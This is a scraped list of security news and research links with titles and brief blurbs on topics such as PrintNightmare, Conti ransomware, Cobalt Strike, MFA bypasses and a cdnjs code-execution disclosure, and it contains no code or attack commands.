good post >> High School Student to InfoSec Pro: An Old College Try https://cradersecurity.com/articles/high-school-to-infosec-pro-part-1/
Crader Security
High School Student to InfoSec Pro: An Old College Try
How to tell if a career in Information Security is right for you. A multi-part series detailing how to land your first position in the security field.
Hacker deposited $1M in a popular cybercrime marketplace to buy zero-day exploits https://securityaffairs.co/wordpress/119845/cyber-crime/hacker-zero-day.html
Security Affairs
Hacker deposited $1M in a popular cybercrime marketplace to buy zero-day exploits
A threat actor has deposited 26.99 Bitcoins on one of the cybercrime forums, he aims at purchasing zero-day exploits from other forum members.
LibInjection – Detect SQL Injection (SQLi) and Cross-Site Scripting (XSS) https://www.darknet.org.uk/2021/05/libinjection-detect-sql-injection-sqli-and-cross-site-scripting-xss/
Darknet - Hacking Tools, Hacker News & Cyber Security
LibInjection - Detect SQL Injection (SQLi) and XSS
LibInjection is a C library to Detect SQL Injection (SQLi) and Cross-Site Scripting (XSS) through lexical analysis of real-world Attacks.
Tracking Cobalt Strike: A Trend Micro Vision One Investigation https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html
Trend Micro
Tracking Cobalt Strike: A Trend Micro Vision One Investigation
Sneaky Malware Reconfigures Hive OS Wallet for Profit https://securehoney.net/blog/sneaky-malware-reconfigures-hive-os-wallet-for-profit.html
Secure Honey
Sneaky Malware Reconfigures Hive OS Wallet for Profit | Secure Honey
I recently observed some malware (uploaded to my honeypot) that targets Hive OS's wallet configuration -- to redirect mined coins to the attacker.
Conti Unpacked | Understanding Ransomware Development As a Response to Detection https://labs.sentinelone.com/conti-unpacked-understanding-ransomware-development-as-a-response-to-detection/
SentinelOne
Conti Unpacked | Understanding Ransomware Development As a Response to Detection - SentinelLabs
Conti's rapid encryption speed is matched only by its rapid evolution. SentinelLabs' deep dive explores its development in unprecedented detail.
PRINTNIGHTMARE NETWORK ANALYSIS https://labs.jumpsec.com/printnightmare-network-analysis/
JUMPSEC Labs
PRINTNIGHTMARE NETWORK ANALYSIS
DNSStager: hide and transfer your payload using DNS https://securityonline.info/dnsstager-hide-and-transfer-your-payload-using-dns/
Cybersecurity News
DNSStager v1.0 releases: hide and transfer your payload using DNS
DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests
Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html
Playing with PrintNightmare https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
0xdf hacks stuff
Playing with PrintNightmare
CVE-2021-34527, or PrintNightmare, is a vulnerability in the Windows Print Spooler that allows for a low priv user to escalate to administrator on a local box or on a remote server. This is especially bad because it is not uncommon for Domain Controllers…
Page Tables, VAD and PEB https://resources.infosecinstitute.com/topic/finding-enumerating-processes-within-memory-part-2/
Infosec Resources
Page tables, VAD and PEB | Infosec Resources
In this part of the series, we will understand how the process can be enumerated within memory. Just as a refresher in part 1 of this series we had a look
New tool automatically finds buffer overflow vulnerabilities (for RUST) https://cylab.cmu.edu/news/2021/07/09-SyRust.html
www.cylab.cmu.edu
New tool automatically finds buffer overflow vulnerabilities
A team of CyLab researchers have designed a new tool that automatically checks for memory bugs—the types of bugs that can lead to buffer overflow exploits, a commonly deployed cyberattack.
Exploit mitigations: keeping up with evolving and complex software/hardware https://research.nccgroup.com/2021/06/28/exploit-mitigations-keeping-up-with-evolving-and-complex-software-hardware/
UDP Technology IP Camera vulnerabilities
https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) https://medium.com/tenable-techblog/examining-crypto-and-bypassing-authentication-in-schneider-electric-plcs-m340-m580-f37cf9f3ff34
Medium
Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)
It looks like authentication, but is it really?
You ain’t got no problem, Jules. I’m on the Multifactor. https://curtbraz.medium.com/you-aint-got-no-problem-jules-i-m-on-the-multifactor-e05d5e2a6ade
Medium
You ain’t got no problem, Jules. I’m on the Multifactor.
Practical Bypasses for MFA with Poor Implementations
Remote code execution in cdnjs of Cloudflare https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
blog.ryotak.net
Remote code execution in cdnjs of Cloudflare
Preface
(日本語版も公開されています。)
Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments.
This article describes vulnerabilities reported through this program and published…
(日本語版も公開されています。)
Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments.
This article describes vulnerabilities reported through this program and published…
FickerStealer: A New Rust Player in the Market https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market
Cyberark
FickerStealer: A New Rust Player in the Market
This blog introduces a new information stealer, written in Rust and interestingly named FickerStealer. In this blog post, we provide an in-depth analysis of this new threat and its obfuscation...
Ecuador's state-run CNT under attack via RansomEXX Ransomware https://www.secureblink.com/cyber-security-news/ecuador's-state-run-cnt-under-attack-via-ransomexx-ransomware
Secure Blink
Ecuador's state-run CNT under attack via RansomEXX Ransomware | Secure Blink
CNT hit by RansomEXX ransomware. Customer and corporate data compromised and hosted on the breached website. 190 GB of data supposedly stolen...